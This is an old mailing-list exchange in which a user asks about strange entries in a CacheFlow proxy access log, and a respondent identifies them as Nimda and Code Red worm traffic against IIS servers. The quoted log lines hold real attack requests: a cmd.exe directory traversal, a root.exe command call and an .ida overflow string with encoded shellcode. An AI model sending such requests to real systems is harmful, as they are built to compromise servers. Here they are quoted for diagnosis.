>
> Hello,
> I need some help with the following messages that had been
> appeared in my
> CacheFlow access log file.
>
>
> 200.xxx.xxx.xxxTCP_ERR_MISS/301 162 GET
> http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir -
> DIRECT/- -
> 200.xxx.xxx.xxx TCP_ERR_MISS/301 162 GET
> http://www/scripts/root.exe?/c+dir
> - DIRECT/- -
>
> What this messages supposed to mean? they came up from dozens
> of diferents
> IP address.
>
this is part of nimda -> its trying to do something nasty to a windows
box...running iis
>
>
> Also there�s severals .ida requests messages like this
>
> 200.xxx.xxx.xxx TCP_ERR_MISS/503 2874 GET
> http://200.xxx.xxx.xxx/default.ida?XXXXX... XXXXXXXXXXXX
> XXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u68
> 58%ucbd3%u7801%u9090%u9090%u8190
> %u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a - DIRECT/- -
ida/idq exploits...again nimda trying to do bad things to a
windows box running iis
>
> Now, in this case....the first IP address is the one that is
> infected with
> de red code, right?
> and the second one its the host that is trying to infect?
> so...if the second
> one is not a machine
> running IIS, those mesagges doesnt really care, right?
>
>
codered/nimda -> similar methods of attack.
yes in yur logs, that is what yore seeing...
the first box is "attacking" the second box is being hit.
the only downside of it, is that its going to use up some
bandwidth.
> Thanks,
> Walter
>
> _________________________________________________________________
> Get your FREE download of MSN Explorer at
> http://explorer.msn.com/intl.asp
>
>
